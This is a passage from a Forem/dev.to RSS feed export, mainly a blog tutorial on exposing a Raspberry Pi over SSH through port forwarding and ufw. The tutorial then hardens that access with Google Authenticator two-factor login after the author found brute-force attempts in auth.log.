currents.&lt;br&gt;
Pretty interesting all in all; not great, not terrible.&lt;/p&gt;

&lt;p&gt;Thank you for reading this! If you've found this interesting, consider leaving a ❤️ &amp;amp; 🦄, and of course, share and comment your thoughts!&lt;/p&gt;

&lt;p&gt;Lloyds is available for partnerships and open for new projects. If you want to know more about us, click &lt;a href="//lloyds-design.com"&gt;here&lt;/a&gt;.  &lt;/p&gt;

&lt;p&gt;Also, don’t forget to follow us on &lt;a href="https://www.instagram.com/lloyds.design/?hl=en" rel="noopener noreferrer"&gt;Instagram&lt;/a&gt; and &lt;a href="https://www.facebook.com/lloydsgn/" rel="noopener noreferrer"&gt;Facebook&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>raspberrypi</category>
      <category>nrf24l01</category>
      <category>art</category>
      <category>hack</category>
    </item>
    <item>
      <title>Establishing and securing a remote connection to Raspberry Pi</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Mon, 28 Sep 2020 09:25:23 +0000</pubDate>
      <link>https://forem.com/lloyds-digital/establishing-and-securing-a-remote-connection-to-raspberry-pi-45e7</link>
      <guid>https://forem.com/lloyds-digital/establishing-and-securing-a-remote-connection-to-raspberry-pi-45e7</guid>
      <description>&lt;p&gt;Today I’m writing about server security, specifically, on my homemade server running on Raspberry Pi. I’ve recently configured a homemade server (if you're interested you should definitely check out &lt;a href="https://dev.to/lloyds-digital/how-you-can-host-websites-from-home-4pke"&gt;this blog&lt;/a&gt;) with a still unknown purpose. This could be your standard Media server, IoT device controller, web server, or whatever else you can imagine. The possibilities are endless. This type of device is usually configured, plugged into power, and chucked behind your router/tv/any other bunch of wires. For convenience, you’ll probably enable SSH on it so it can be accessed from anywhere in the world without the need to connect a keyboard, mouse, and a screen to it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Focftleb1lis7szmguhfh.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Focftleb1lis7szmguhfh.jpg" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;My homemade web server - Raspberry Pi 3B+ running Raspbian GNU/Linux 10 (buster)&lt;/em&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Enabling SSH on your Raspberry Pi
&lt;/h1&gt;

&lt;p&gt;Enabling remote access to your Pi is as easy as saying pie! This can be done through the GUI or the CLI; both are extremely simple. The CLI way is as simple as typing &lt;code&gt;sudo systemctl start ssh&lt;/code&gt;. Then check that it's working with &lt;code&gt;sudo systemctl status ssh&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F91pvl4gxzxh2fmtiza2s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F91pvl4gxzxh2fmtiza2s.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;GUI version of enabling SSH&lt;/em&gt;&lt;/p&gt;
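&lt;p&gt;One thing worth knowing: &lt;code&gt;systemctl start&lt;/code&gt; only starts the service until the next reboot. A minimal sketch of making SSH survive reboots, using standard systemd commands (shown for reference):&lt;/p&gt;

```shell
# Register sshd to start automatically on every boot, then start it now.
sudo systemctl enable ssh   # persist across reboots
sudo systemctl start ssh    # start immediately
sudo systemctl status ssh   # confirm it reports "active (running)"
```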

&lt;p&gt;We’re halfway to making your device publicly accessible. Once you’ve enabled SSH on your device, you have to forward connections arriving at your router on port 22 (the default SSH port) to your device. Port forwarding simply tells someone connecting to the router where to ask next (in this case, our server). You can imagine the router's address being the literal street address of a building: you know who you want to visit, but not exactly where in the building they are. Once you reach the address (the router), it tells you which floor and apartment the person you want to visit is in. This is what we do with port forwarding. &lt;/p&gt;
&lt;h2&gt;
  
  
  Port Forwarding
&lt;/h2&gt;

&lt;p&gt;The next thing we have to do is configure port forwarding on our router. To access your router, open any web browser and type your default gateway into the URL bar. The most common default gateway for home wireless routers is 192.168.0.1. If this isn’t working for you, you can &lt;a href="https://www.google.com/search?rlz=1C1GCEA_enHR913HR914&amp;amp;sxsrf=ALeKk038TKlwFVg4SF0WP6He0pY2tpoXyA%3A1600682905936&amp;amp;ei=mXtoX4LaOJGTkwWA6Kf4Bw&amp;amp;q=What+is+my+default+gateway+&amp;amp;oq=What+is+my+default+gateway+&amp;amp;gs_lcp=CgZwc3ktYWIQAzIECCMQJzIECCMQJzICCAAyBwgAEBQQhwIyAggAMgIIADICCAAyAggAMgIIADICCAA6BAgAEEc6BAgAEENQgBBYzzhgpjtoAnAEeACAAZ8BiAHpGJIBBDIuMjWYAQCgAQGqAQdnd3Mtd2l6yAEIwAEB&amp;amp;sclient=psy-ab&amp;amp;ved=0ahUKEwjCiobAgPrrAhWRyaQKHQD0CX8Q4dUDCA0&amp;amp;uact=5" rel="noopener noreferrer"&gt;check with google&lt;/a&gt; what your default gateway is. You will be presented with a login screen; this is your router’s settings page. Don’t worry if the address results in a “This site can’t be reached” response; you will have to look up your router model anyway to find the default credentials for logging in. Once you’re logged in, look for something that says “Forwarding” and add a new rule there.&lt;/p&gt;

&lt;p&gt;Now, to know where we want to forward incoming requests, we need our Raspberry Pi's local address. The command &lt;code&gt;hostname -I&lt;/code&gt; tells us which local address we’re on.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tomas@raspberrypi:~ $ hostname -I
192.168.0.27
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
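&lt;p&gt;If you'd rather read the gateway address off the Pi itself than guess common defaults, the routing table already knows it. A small sketch (the interface name and exact line format will differ per system):&lt;/p&gt;

```shell
# The default route line looks like "default via 192.168.0.1 dev wlan0";
# the third field is the router's (default gateway's) address.
ip route show default | awk '/^default/ {print $3}'
```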



&lt;p&gt;Now we can tell our router the following: “Whenever someone tries to connect to you using SSH (commonly port 22), redirect them to the device at address 192.168.0.27, also on port 22.” Your router's interface might not look the same as mine, but it should be very similar. Here are my forwarded ports. Internal refers to devices within the household and external is the wide public. The external address is kept as 0.0.0.0 since it’s not fixed (a dynamic IP, more on that later), and the router will translate it into its actual external IP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Frmviklg8ylyo4r400x4d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Frmviklg8ylyo4r400x4d.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;This is how your port forwarding should look once configured. Notice ports 443 and 80 are also active; they are used for the web hosting I'm currently working on, but I won’t touch on that today&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Once you have configured port forwarding, you still shouldn’t be able to connect to your machine. This is due to your firewall doing a great job of blocking incoming requests. If you’re able to connect to your machine right after this step, please install a firewall &lt;strong&gt;immediately&lt;/strong&gt; with &lt;code&gt;sudo apt-get install ufw&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;The final step is allowing SSH through the firewall (and, if ufw isn't active yet, enabling it with &lt;code&gt;sudo ufw enable&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ufw allow OpenSSH
&lt;span class="go"&gt;Rule added
Rule added (v6)
&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ufw allow SSH
&lt;span class="go"&gt;Rule added
Rule added (v6)
&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ufw status
&lt;span class="go"&gt;Status: active
To                         Action      From
--                         ------      ----
OpenSSH                    ALLOW       Anywhere
WWW Full                   ALLOW       Anywhere
443                        ALLOW       Anywhere
SSH                        ALLOW       Anywhere
OpenSSH (v6)               ALLOW       Anywhere (v6)
WWW Full (v6)              ALLOW       Anywhere (v6)
443 (v6)                   ALLOW       Anywhere (v6)
SSH (v6)                   ALLOW       Anywhere (v6)

&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This should’ve opened your port 22, and now, if you know your external IP address, you should be able to connect to your Raspberry Pi from anywhere in the world. Finding your external IP is as simple as googling “what's my IP”.&lt;/p&gt;
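&lt;p&gt;You can also get the external address straight from the Pi's CLI by asking a public echo service; &lt;code&gt;ifconfig.me&lt;/code&gt; is one such service (any equivalent works), shown here as a sketch since it depends on network access:&lt;/p&gt;

```shell
# Ask an external echo service which address our requests appear to come from.
# This prints the router's public IP, not the Pi's local 192.168.x.x address.
curl -s ifconfig.me
```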

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fjauhndgpx9hptckz2goo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fjauhndgpx9hptckz2goo.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we can connect to our machine from anywhere in the world: Windows, Mac OS X, Linux, and pretty much anything with a CLI. It’s as simple as writing &lt;code&gt;ssh pi@188.252.184.34&lt;/code&gt;, which tries to establish an SSH connection to the device located at 188.252.184.34 as the user “pi”. The request comes to our router, the router forwards it to our server, and the server challenges us for the password.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;C:\Users\Tomas&amp;gt;&lt;/span&gt;ssh tomas@martincic.dev
&lt;span class="go"&gt;Password:
&lt;/span&gt;&lt;span class="gp"&gt;Linux raspberrypi 5.4.51-v7+ #&lt;/span&gt;1333 SMP Mon Aug 10 16:45:19 BST 2020 armv7l
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;The programs included with the Debian GNU/Linux system are free software;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 20 17:05:18 2020 from ::1
&lt;/span&gt;&lt;span class="gp"&gt;Linux raspberrypi 5.4.51-v7+ #&lt;/span&gt;1333 SMP Mon Aug 10 16:45:19 BST 2020 armv7l
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;The programs included with the Debian GNU/Linux system are free software;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 20 17:05:18 2020 from ::1
&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;exit&lt;/span&gt;
&lt;span class="go"&gt;logout
Connection to martincic.dev closed.

&lt;/span&gt;&lt;span class="gp"&gt;C:\Users\Tomas&amp;gt;&lt;/span&gt;ssh tomas@188.252.184.34
&lt;span class="go"&gt;Password:
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And as hackers would say in movies: “We’re in!” Now whatever you write in this command line will be executed on the server you are connected to. &lt;br&gt;
&lt;strong&gt;Tip:&lt;/strong&gt; if you’re having trouble connecting, check &lt;a href="//canyouseeme.org"&gt;CanYouSeeMe.org&lt;/a&gt; to see whether port 22 is open. If it’s not, you may have configured something incorrectly, or you might have to contact your service provider to unlock port forwarding for you.&lt;br&gt;
&lt;strong&gt;Tip:&lt;/strong&gt; most often, internet service providers give your router a so-called dynamic IP, which means your IP address will change every 24-48 hours.&lt;/p&gt;

&lt;p&gt;Notice I’m logging in with &lt;code&gt;tomas@martincic.dev&lt;/code&gt;. This is the user “tomas” trying to SSH into the domain “martincic.dev”, which resolves to my router’s external IP address (188.252.184.34). In the bottom part you can see I exit the connection and SSH again with the actual IP; it has the same effect.&lt;/p&gt;
&lt;h2&gt;
  
  
  Dangers of SSH
&lt;/h2&gt;

&lt;p&gt;The first time I configured my server, it took only about 8 hours before I noticed some rather suspicious activity. I was looking through auth.log (the log of all authentication attempts, located at /var/log/auth.log) when I noticed some strange requests from even stranger places. To see only failed authentications, you can use&lt;/p&gt;

&lt;p&gt;&lt;code&gt;cat /var/log/auth.log | grep 'Failed password'&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Sep 13 12:20:57 raspberrypi sshd[11951]: Invalid user felipe from 171.227.23.152 port 45198
Sep 13 12:20:58 raspberrypi sshd[11947]: Invalid user carmen from 171.227.23.152 port 35314
Sep 13 12:20:58 raspberrypi sshd[11959]: Invalid user pos from 171.227.23.152 port 46060
Sep 13 12:21:04 raspberrypi sshd[11981]: Invalid user shell from 171.227.23.152 port 42546
Sep 13 12:21:10 raspberrypi sshd[11992]: Invalid user linux from 171.227.23.152 port 1201
Sep 13 12:21:14 raspberrypi sshd[12004]: Invalid user admian from 171.227.23.152 port 36314
Sep 13 12:21:19 raspberrypi sshd[12007]: Invalid user iris from 171.227.23.152 port 39514
Sep 13 12:21:30 raspberrypi sshd[12022]: Invalid user edwin from 171.227.23.152 port 34324
Sep 13 12:21:33 raspberrypi sshd[12025]: Invalid user pos from 171.227.23.152 port 40330
Sep 13 12:31:07 raspberrypi sshd[12054]: Invalid user admin from 141.98.9.163 port 43245
Sep 13 12:31:12 raspberrypi sshd[12061]: Invalid user admin from 141.98.9.164 port 40057
Sep 13 12:31:14 raspberrypi sshd[12068]: Invalid user user from 141.98.9.165 port 36501
Sep 13 12:31:18 raspberrypi sshd[12075]: Invalid user admin from 141.98.9.166 port 46491
Sep 13 12:31:24 raspberrypi sshd[12080]: Invalid user osmc from 75.157.255.178 port 39744
Sep 13 12:31:30 raspberrypi sshd[12094]: Invalid user operator from 141.98.9.162 port 40986
Sep 13 12:31:35 raspberrypi sshd[12102]: Invalid user test from 141.98.9.163 port 40121
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And after this command, I was greeted by what looked like a brute-force attack attempt. It had been going on for 30 minutes, with a request every 2-5 seconds under a different username but mostly from the same address: a total of 1083 login attempts within 30 minutes. A website called &lt;a href="//whatismyipaddress.com"&gt;whatismyipaddress.com&lt;/a&gt; can give you interesting information about an IP address you look up. The IP 171.227.23.152, which alone submitted more than 1000 login attempts, came from Vietnam.&lt;/p&gt;
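&lt;p&gt;To see who is hammering your server the hardest, you can aggregate the log by source address. A rough sketch (sshd log formats vary slightly between versions, so this just extracts anything that looks like an IPv4 address from the failed-password lines):&lt;/p&gt;

```shell
# Count failed password attempts per source IP, most active first.
grep 'Failed password' /var/log/auth.log \
  | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' \
  | sort | uniq -c | sort -rn | head
```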

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F4n4r47yv2mtqcpapa876.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F4n4r47yv2mtqcpapa876.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is why we have to improve our security. Leaving a password-only SSH login exposed to the internet is the equivalent of locking your door but leaving the keys under the doormat. Since the server is active 24/7 and you’re not on it every day, it would be very easy for a bot like this to keep working on your server until it cracks it. Once your server is compromised, it too can be used for malicious activity on the internet and help the initial bot in new attacks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Installing 2-factor authentication
&lt;/h2&gt;

&lt;p&gt;Setting up 2-factor authentication is relatively easy. As with any other package you install, you should first update your package lists with &lt;code&gt;sudo apt-get update&lt;/code&gt;; you always want to make sure you’re running up-to-date software. We will install Google's two-factor authentication PAM module, packaged as &lt;code&gt;libpam-google-authenticator&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo apt-get install libpam-google-authenticator&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Once you’ve installed the package on the server, install the authenticator app on your mobile device as well. Google Authenticator is available on the &lt;a href="https://play.google.com/store/apps/details?id=com.google.android.apps.authenticator2&amp;amp;hl=en" rel="noopener noreferrer"&gt;Play Store&lt;/a&gt;, the &lt;a href="https://apps.apple.com/us/app/google-authenticator/id388497605" rel="noopener noreferrer"&gt;App Store&lt;/a&gt;, and even as a &lt;a href="https://chrome.google.com/webstore/detail/authenticator/bhghoamapcdpbohphigoooaddinpkbai?hl=en" rel="noopener noreferrer"&gt;Chrome Extension&lt;/a&gt;. Once you’ve installed it on both devices, you can move on to the next step.&lt;/p&gt;

&lt;h2&gt;
  
  
  Configuring Google Authenticator
&lt;/h2&gt;

&lt;p&gt;Before we even start configuring Google Authenticator, we should enable ChallengeResponseAuthentication in our SSH daemon. This lets the server challenge connecting users with additional authentication. You can find out more about this &lt;a href="https://access.redhat.com/solutions/336773#:~:text=%22ChallengeResponseAuthentication%22%20option%20controls%20support%20for,only%20for%20the%20user's%20password." rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo nano /etc/ssh/sshd_config&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fdapre7lr2nzpmgi94vnm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fdapre7lr2nzpmgi94vnm.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;
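&lt;p&gt;Inside &lt;code&gt;sshd_config&lt;/code&gt;, the relevant line should end up looking like this (note that on newer OpenSSH releases the same option is named &lt;code&gt;KbdInteractiveAuthentication&lt;/code&gt;, so check which one your version uses):&lt;/p&gt;

```shell
# /etc/ssh/sshd_config (excerpt)
# Allow sshd to issue keyboard-interactive challenges such as 2FA codes.
ChallengeResponseAuthentication yes
```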

&lt;p&gt;Now, once this is out of the way, we have to configure the Pluggable Authentication Module (PAM for short). PAM provides dynamic authentication support for applications and services on a Linux system. The relevant file is &lt;code&gt;/etc/pam.d/sshd&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo nano /etc/pam.d/sshd&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fbjkvod7defx7l9rj580d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fbjkvod7defx7l9rj580d.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here you have to add the following line: &lt;/p&gt;

&lt;p&gt;&lt;code&gt;auth required pam_google_authenticator.so&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;You can add this line either above or below &lt;code&gt;@include common-auth&lt;/code&gt;; the only difference is the moment you’re asked for the authentication code. Placing it above common-auth makes the server challenge the user for the code before the password, and placing it below challenges after the password. I prefer before, so a bot trying to connect cannot even start guessing the password.&lt;/p&gt;
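&lt;p&gt;With the challenge-before-password choice, the relevant part of &lt;code&gt;/etc/pam.d/sshd&lt;/code&gt; would look roughly like this:&lt;/p&gt;

```shell
# /etc/pam.d/sshd (excerpt)
# Challenge for the verification code first...
auth required pam_google_authenticator.so
# ...then fall through to the standard password prompt.
@include common-auth
```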

&lt;p&gt;You should restart the SSH daemon now. &lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo systemctl restart ssh&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;You’re ready for the final step now: activating Google Authenticator. Run the tool we installed at the beginning and follow its prompts. It will show a QR code that can be scanned with the mobile app, and also a setup key in case you’re uncomfortable giving the app camera access. Start the process with:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;google-authenticator&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; once you’re presented with the QR code, take your time to write down the emergency scratch codes; they are your lifeline if your mobile device isn’t accessible.&lt;/p&gt;

&lt;p&gt;You can set this up however you like. My choices were: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Time-based tokens [Yes]&lt;/li&gt;
&lt;li&gt;Update your /home/pi/.google_authenticator file (&lt;strong&gt;required Yes&lt;/strong&gt;)&lt;/li&gt;
&lt;li&gt;Disallowing multiple uses of same token [Yes]&lt;/li&gt;
&lt;li&gt;Poor synchronization adjustment [No]&lt;/li&gt;
&lt;li&gt;Limit to 3 logins per 30 seconds [Yes]&lt;/li&gt;
&lt;/ol&gt;
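&lt;p&gt;For what it's worth, the same answers can usually be supplied non-interactively via flags, which is handy when setting up several machines; the exact options may differ by version, so check &lt;code&gt;man google-authenticator&lt;/code&gt; on your system first. A sketch matching the choices above:&lt;/p&gt;

```shell
# -t time-based tokens, -d disallow reuse of the same token,
# -f write ~/.google_authenticator without asking,
# -w 3 keep the default code window (no extra skew allowance),
# -r 3 -R 30 limit to 3 login attempts per 30 seconds.
google-authenticator -t -d -f -w 3 -r 3 -R 30
```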

&lt;p&gt;And that’s it. You’re ready to try SSH with your new authenticator! &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fk12gwwqg5tl1gc1yudfj.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fk12gwwqg5tl1gc1yudfj.jpg" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Authentication code challenge upon SSH request&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;When the verification code doesn't match, you will still be prompted for a password even though you failed step 1 of authentication. This is useful because an attacker has no idea they failed step 1, and even if they provide a valid password they still won’t be allowed access. You will be prompted for the verification code 3 times before the authenticator blocks you completely. In the picture below, I provided the right password every time but deliberately entered wrong verification codes. Google Authenticator simply denies access on a wrong code and waits for the connection to time out.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ffjfgee43ztc6jxt2ath2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ffjfgee43ztc6jxt2ath2.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Wrong codes with the right password provided every time&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;This SSH access to our remote machine is useful for IoT devices and any kind of server maintenance, and adding a second factor has further improved the device's security. The most secure method of access would be a public/private key pair, but that is less convenient since you don't carry your key around the way you carry your phone. This way you can show off to your friends and still have a good dose of security. As long as you’re not storing highly sensitive information on the machine, this method is secure enough.&lt;/p&gt;

</description>
      <category>raspberrypi</category>
      <category>ssh</category>
      <category>2fa</category>
      <category>security</category>
    </item>
  </channel>
</rss>
